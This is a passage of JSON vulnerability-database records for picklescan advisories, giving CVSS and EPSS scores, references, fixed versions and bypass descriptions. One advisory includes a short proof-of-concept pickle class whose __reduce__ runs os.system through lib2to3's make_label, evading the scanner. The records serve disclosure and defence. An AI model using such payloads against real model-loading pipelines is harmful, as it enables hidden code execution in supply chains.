"scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-r8g5-cgf2-4m4m", "reference_id": "GHSA-r8g5-cgf2-4m4m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r8g5-cgf2-4m4m" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-r8g5-cgf2-4m4m", "reference_id": "GHSA-r8g5-cgf2-4m4m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-r8g5-cgf2-4m4m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-r8g5-cgf2-4m4m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fxc2-cr37-fuhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/116067?format=api", "vulnerability_id": "VCID-gacp-pewf-qkbc", "summary": "picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1716", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.16248", "scoring_system": "epss", "scoring_elements": "0.94989", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.16248", "scoring_system": "epss", "scoring_elements": "0.94994", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.16248", "scoring_system": "epss", "scoring_elements": "0.94972", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.16248", "scoring_system": "epss", "scoring_elements": "0.94991", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-1716" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-18.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-18.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1716", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1716" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1716", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1716" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/78ce704227c51f070c0c5fb4b466d92c62a7aa3d", "reference_id": "78ce704227c51f070c0c5fb4b466d92c62a7aa3d", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-02-26T15:49:26Z/" } ], "url": "https://github.com/mmaitre314/picklescan/commit/78ce704227c51f070c0c5fb4b466d92c62a7aa3d" }, { "reference_url": "https://www.sonatype.com/security-advisories/cve-2025-1716", "reference_id": "cve-2025-1716", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-02-26T15:49:26Z/" } ], "url": "https://www.sonatype.com/security-advisories/cve-2025-1716" }, { "reference_url": "https://github.com/advisories/GHSA-655q-fx9r-782v", "reference_id": "GHSA-655q-fx9r-782v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-655q-fx9r-782v" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v", "reference_id": "GHSA-655q-fx9r-782v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-02-26T15:49:26Z/" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87035?format=api", "purl": "pkg:pypi/picklescan@0.0.21", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cce-4mst-r7h4" }, { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-4u6x-5jg3-jbfx" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-be29-rx33-b7dp" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-bgy1-36ca-fudc" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-d4vv-a8kx-5kdc" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-eub2-wr7z-c3e6" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gacp-pewf-qkbc" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kmwg-e2gf-9yb7" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-rqap-hdeb-1ffb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-uwy3-anph-f7gv" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-yvv5-7ah5-dfd8" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.21" }, { "url": "http://public2.vulnerablecode.io/api/packages/87036?format=api", "purl": "pkg:pypi/picklescan@0.0.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cce-4mst-r7h4" }, { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-4u6x-5jg3-jbfx" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-d4vv-a8kx-5kdc" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-eub2-wr7z-c3e6" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kmwg-e2gf-9yb7" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-rqap-hdeb-1ffb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-yvv5-7ah5-dfd8" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.22" } ], "aliases": [ "CVE-2025-1716", "GHSA-655q-fx9r-782v", "PYSEC-2025-18" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gacp-pewf-qkbc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360550?format=api", "vulnerability_id": "VCID-gbvh-fs1r-xqcw", "summary": "Duplicate Advisory: Picklescan is Vulnerable to Unsafe Globals Check Bypass through Subclass Imports\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-f7qq-56ww-84cr. This link is maintained to preserve external references.\n\n### Original Description\nA Protection Mechanism Failure vulnerability in mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass the unsafe globals check. This is possible because the scanner performs an exact match for module names, allowing malicious payloads to be loaded via submodules of dangerous packages (e.g., 'asyncio.unix_events' instead of 'asyncio'). \n\nWhen the incorrectly considered safe file is loaded after scan, it can lead to the execution of malicious code.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10157", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10157" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f7qq-56ww-84cr", "reference_id": "GHSA-f7qq-56ww-84cr", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f7qq-56ww-84cr" }, { "reference_url": "https://github.com/advisories/GHSA-hf6h-9wq7-hmjg", "reference_id": "GHSA-hf6h-9wq7-hmjg", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hf6h-9wq7-hmjg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89083?format=api", "purl": "pkg:pypi/picklescan@0.0.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.31" } ], "aliases": [ "GHSA-hf6h-9wq7-hmjg" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gbvh-fs1r-xqcw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/113420?format=api", "vulnerability_id": "VCID-hg5h-54nq-bber", "summary": "An Improper Input Validation vulnerability in the scanning logic of mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass pickle files security checks by supplying a standard pickle file with a PyTorch-related file extension. When the pickle file incorrectly considered safe is loaded, it can lead to the execution of malicious code.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-10155", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00072", "scoring_system": "epss", "scoring_elements": "0.2211", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00072", "scoring_system": "epss", "scoring_elements": "0.22292", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00072", "scoring_system": "epss", "scoring_elements": "0.22313", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00072", "scoring_system": "epss", "scoring_elements": "0.223", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-10155" }, { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/28a7b4ef753466572bda3313737116eeb9b4e5c5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/28a7b4ef753466572bda3313737116eeb9b4e5c5" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-151.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-151.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10155", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10155" }, { "reference_url": "https://github.com/advisories/GHSA-jgw4-cr84-mqxg", "reference_id": "GHSA-jgw4-cr84-mqxg", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jgw4-cr84-mqxg" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-jgw4-cr84-mqxg", "reference_id": "GHSA-jgw4-cr84-mqxg", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:03:48Z/" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-jgw4-cr84-mqxg" }, { "reference_url": "https://github.com/mmaitre314/picklescan/blob/58983e1c20973ac42f2df7ff15d7c8cd32f9b688/src/picklescan/scanner.py#L463", "reference_id": "scanner.py#L463", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:03:48Z/" } ], "url": "https://github.com/mmaitre314/picklescan/blob/58983e1c20973ac42f2df7ff15d7c8cd32f9b688/src/picklescan/scanner.py#L463" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89083?format=api", "purl": "pkg:pypi/picklescan@0.0.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.31" } ], "aliases": [ "CVE-2025-10155", "GHSA-jgw4-cr84-mqxg", "PYSEC-2025-151" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hg5h-54nq-bber" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360658?format=api", "vulnerability_id": "VCID-hm3p-7t8t-bfb7", "summary": "Picklescan is missing detection when calling built-in python lib2to3.pgen2.pgen.ParserGenerator.make_label\n### Summary\n\nUsing lib2to3.pgen2.pgen.ParserGenerator.make_label function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to lib2to3.pgen2.pgen.ParserGenerator.make_label function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nfrom types import SimpleNamespace\nfrom lib2to3.pgen2.pgen import ParserGenerator\n\nclass EvilLib2to3Pgen2ParserGeneratorMakeLabel:\n def __reduce__(self):\n c = SimpleNamespace(labels=[], keywords={}, tokens={})\n label = '\"\"+__import__(\\'os\\').system(\\'whoami\\')'\n return ParserGenerator.make_label, (None, c, label)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-p9w7-82w4-7q8m", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": 